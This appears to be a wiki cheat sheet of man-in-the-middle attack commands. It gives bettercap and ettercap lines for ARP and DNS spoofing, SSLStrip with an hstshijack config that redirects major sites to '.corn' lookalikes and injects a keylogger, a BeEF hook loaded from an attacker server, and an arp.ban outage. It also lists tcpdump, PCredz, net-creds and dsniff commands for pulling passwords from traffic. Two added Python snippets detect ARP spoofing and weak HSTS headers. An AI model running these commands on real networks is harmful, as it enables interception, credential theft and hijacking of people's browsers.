MitM Commands
Koutto edited this page Nov 1, 2020
- ARP spoofing with ettercap:
```
ifconfig wlan0 10.0.0.1 up netmask 255.255.255.0
sysctl -w net.ipv4.ip_forward=1
ettercap -T -q -i <interface> -w dump -M ARP /<ip_target>/ /<ip_gateway>/
```
Note: Do not forget to enable IP forwarding (the sysctl above), otherwise the targets lose their internet connection.
- Start bettercap with the web UI caplet and discover hosts:
```
bettercap -caplet https-ui -iface <interface>
net.recon on   # Periodically read the ARP table in order to detect new hosts on the LAN
net.probe on   # Send different types of probes to each IP in the current subnet
```
IMPORTANT: net.probe MUST be turned OFF before running arp.spoof on (otherwise the two conflict!)
Ref: https://www.bettercap.org/
- ARP spoofing with bettercap:
```
arp.spoof off
net.probe off                        # IMPORTANT: Avoid conflict with ARP spoofing
set arp.spoof.targets <IP_target>    # Supports IP addresses / IP ranges / MAC addresses
set arp.spoof.internal true          # Enable ARP spoofing on internal network
arp.spoof on
```
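From the defender's side, the arp.spoof configuration above leaves a recognisable trace in ARP replies: a gateway IP whose MAC suddenly changes, and one MAC claiming the gateway plus other hosts. This added Python example (not part of the page or of bettercap) flags both patterns over a constructed sample of (sender IP, sender MAC) pairs such as `tcpdump -i <interface> -n arp` or bettercap's net.recon would show.

```python
"""Flag ARP reply patterns typical of an arp.spoof session. Added example
from a defender's perspective; the sample events below are constructed."""
from collections import defaultdict

# Constructed sample of (sender_ip, sender_mac) pairs as seen in ARP replies.
# The gateway 10.0.0.1 is first announced by aa:..:01 and later claimed by the
# MAC of host 10.0.0.50; host 10.0.0.20 is then rebound to the same MAC.
SAMPLE_ARP_REPLIES = [
    ("10.0.0.1", "aa:aa:aa:aa:aa:01"),
    ("10.0.0.50", "bb:bb:bb:bb:bb:50"),
    ("10.0.0.20", "cc:cc:cc:cc:cc:20"),
    ("10.0.0.1", "bb:bb:bb:bb:bb:50"),   # gateway IP now claimed by 10.0.0.50's MAC
    ("10.0.0.20", "bb:bb:bb:bb:bb:50"),  # a second host rebound to the same MAC
]


def detect_arp_spoof(replies, gateway_ip):
    """Return a list of alert strings, empty when nothing suspicious is seen.

    Two indicators are checked: an IP whose MAC changes after it was first
    seen, and a single MAC that claims the gateway IP plus other hosts (the
    footprint of spoofing both target and gateway). A legitimate DHCP
    reassignment can trigger the first check, so treat alerts as leads.
    """
    first_seen = {}               # ip -> mac announced first
    ips_by_mac = defaultdict(set)  # mac -> set of IPs it has claimed
    alerts = []
    for ip, mac in replies:
        mac = mac.lower()
        ips_by_mac[mac].add(ip)
        if ip not in first_seen:
            first_seen[ip] = mac
        elif first_seen[ip] != mac:
            alerts.append(f"{ip} changed from {first_seen[ip]} to {mac}")
    for mac, ips in ips_by_mac.items():
        if gateway_ip in ips and len(ips) > 1:
            others = sorted(ips - {gateway_ip})
            alerts.append(f"{mac} claims gateway {gateway_ip} and {', '.join(others)}")
    return alerts


if __name__ == "__main__":
    for line in detect_arp_spoof(SAMPLE_ARP_REPLIES, "10.0.0.1"):
        print("ALERT:", line)
```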
- DNS spoofing with bettercap:
```
dns.spoof off
set dns.spoof.domains <domain1>,<domain2>,...
set dns.spoof.address <Target address>
set dns.spoof.all true    # Spoof entire subnet
dns.spoof on
```
Important: the subnet or the target must also be ARP spoofed for DNS spoofing to take effect!
- Sniff all local traffic into a pcap file:
```
net.sniff off
set net.sniff.local true
set net.sniff.verbose 'true'
set net.sniff.output 'capture.pcap'
net.sniff on
```
- Sniff only packets matching a regexp (e.g. password fields):
```
net.sniff off
set net.sniff.local true
set net.sniff.regexp '.*password=.+'
set net.sniff.verbose 'true'
set net.sniff.output 'passwords.pcap'
net.sniff on
```
- SSLStrip / HSTS hijacking with bettercap:
```
net.probe off
arp.spoof off
http.proxy off
set http.proxy.sslstrip true    # SSLStrip only works on HTTPS websites without HSTS
set net.sniff.verbose false
set arp.spoof.targets <IP_target>
hstshijack/hstshijack           # Use the hstshijack caplet, which bypasses HSTS when it is misconfigured
arp.spoof on
http.proxy on
net.sniff on
```
HSTS can be bypassed when:
- The server's domain has not been added to the HSTS preload list with the includeSubDomains attribute set.
- The server replies with HSTS headers, but without the includeSubDomains attribute set.
- hstshijack caplet configuration:
```
set hstshijack.log /usr/share/bettercap/caplets/hstshijack/ssl.log
set hstshijack.ignore *
set hstshijack.targets twitter.com,*.twitter.com,facebook.com,*.facebook.com,apple.com,*.apple.com,ebay.com,*.ebay.com,www.linkedin.com
set hstshijack.replacements twitter.corn,*.twitter.corn,facebook.corn,*.facebook.corn,apple.corn,*.apple.corn,ebay.corn,*.ebay.corn,linkedin.com
set hstshijack.obfuscate false
set hstshijack.encode false
set hstshijack.payloads *:/usr/share/bettercap/caplets/hstshijack/payloads/keylogger.js
set http.proxy.script /usr/share/bettercap/caplets/hstshijack/hstshijack.js
set dns.spoof.domains twitter.corn,*.twitter.corn,facebook.corn,*.facebook.corn,apple.corn,*.apple.corn,ebay.corn,*.ebay.corn,linkedin.com
http.proxy on
dns.spoof on
```
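The two HSTS conditions listed above can be checked from a site's own Strict-Transport-Security header. This added Python example (not from the page, bettercap or hstshijack) parses such a header and reports which of those gaps it leaves open; the one-year max-age threshold is an assumption taken from the preload list's submission requirement.

```python
"""Check a Strict-Transport-Security header against the HSTS weaknesses
listed above. Added example, not part of the page or of bettercap/hstshijack."""

# Assumed threshold (not from the page): the preload list requires a max-age
# of at least one year, so anything shorter is treated as weak here.
MIN_MAX_AGE = 31536000


def parse_hsts(header_value):
    """Split an HSTS header value into a {directive: value} dict.

    Directive names are case-insensitive per RFC 6797, so they are lowered;
    valueless directives (includeSubDomains, preload) map to "".
    """
    directives = {}
    for part in header_value.split(";"):
        part = part.strip()
        if not part:
            continue
        name, _, value = part.partition("=")
        directives[name.strip().lower()] = value.strip().strip('"')
    return directives


def assess_hsts(header_value):
    """Return the list of weaknesses found; an empty list means the policy
    closes both gaps listed above (missing includeSubDomains, no preload)."""
    if header_value is None:
        return ["no HSTS header: the site is downgradable by sslstrip"]
    d = parse_hsts(header_value)
    findings = []
    max_age = d.get("max-age")
    if max_age is None or not max_age.isdigit():
        findings.append("missing or malformed max-age: browsers ignore the header")
    elif int(max_age) == 0:
        findings.append("max-age=0: clears any stored policy, HSTS is off")
    elif int(max_age) < MIN_MAX_AGE:
        findings.append("short max-age: policy lapses quickly and is not preload-eligible")
    if "includesubdomains" not in d:
        findings.append("no includeSubDomains: subdomains stay unprotected (the gap hstshijack relies on)")
    if "preload" not in d:
        findings.append("no preload: the very first connection is made before any policy exists")
    return findings
```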
- BeEF hook injection with bettercap:
  - Start the BeEF service
  - Edit caplets/beef-inject.js with the attacker's IP:
```
'<script type="text/javascript" src="http://<YOUR_SERVER>:3000/hook.js"></script></head>'
```
  - Run bettercap commands:
```
net.probe off
arp.spoof off
http.proxy off
set arp.spoof.targets <IP_target>
beef-active
```
- Ban a target from the network (arp.ban):
```
net.probe off
arp.spoof off
set arp.spoof.targets <IP_target>
arp.ban on
```
- Sniff anything on one interface:
```
tcpdump -i <interface>
```
- Filtering on host (source/destination/any):
```
tcpdump -i <interface> host <IP>
tcpdump -i <interface> src host <IP>
tcpdump -i <interface> dst host <IP>
tcpdump -i <interface> ether host <MAC>
tcpdump -i <interface> ether src host <MAC>
tcpdump -i <interface> ether dst host <MAC>
```
- Filtering on port (source/destination/any):
```
tcpdump -i <interface> port <port>
tcpdump -i <interface> src port <port>
tcpdump -i <interface> dst port <port>
```
- Filtering on network (e.g. network=192.168):
```
tcpdump -i <interface> net <network>
tcpdump -i <interface> src net <network>
tcpdump -i <interface> dst net <network>
```
- Protocol filtering:
```
tcpdump -i <interface> arp
tcpdump -i <interface> ip
tcpdump -i <interface> tcp
tcpdump -i <interface> udp
tcpdump -i <interface> icmp
```
- Combining conditions (example):
```
tcpdump -i <interface> '((tcp) and (port 80) and ((dst host 192.168.1.254) or (dst host 192.168.1.200)))'
```
- Disable name resolution:
```
tcpdump -i <interface> -n
```
- Make sure to capture the whole packet (no truncation):
```
tcpdump -i <interface> -s 0
```
- Write a full pcap file:
```
tcpdump -i <interface> -s 0 -w capture.pcap
```
- Show DNS traffic:
```
tcpdump -i <interface> -nn -l udp port 53
```
- Show HTTP User-Agent & Host headers:
```
tcpdump -i <interface> -nn -l -A -s1500 | egrep -i 'User-Agent:|Host:'
```
- Show HTTP requests & Host headers:
```
tcpdump -i <interface> -nn -l -s 0 -v | egrep -i "POST /|GET /|Host:"
```
- Show email senders and recipients (in egrep's extended syntax, `|` is the alternation operator; `\|` would match a literal pipe):
```
tcpdump -i <interface> -nn -l port 25 | egrep -i 'MAIL FROM|RCPT TO'
```
- Show FTP data:
```
tcpdump -i <interface> -nn -v port ftp or ftp-data
```
- Show passwords sent over different cleartext protocols:
```
tcpdump -i wlan0 -l -A port http or port ftp or port smtp or port imap or port pop3 or port telnet | egrep -i -B5 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user '
```
- With PCredz:
```
./Pcredz -f <pcapfile>       # extract credentials from a pcap file
./Pcredz -i <interface> -v   # extract credentials from a live packet capture on a network interface
```
- With net-creds:
```
python net-creds.py -p <pcapfile>
python net-creds.py -i <interface>
```
- With dsniff:
```
dsniff -p <pcapfile>
dsniff -i <interface>
```
- URL sniffing with urlsnarf:
```
urlsnarf -p <pcapfile>
urlsnarf -i <interface>
```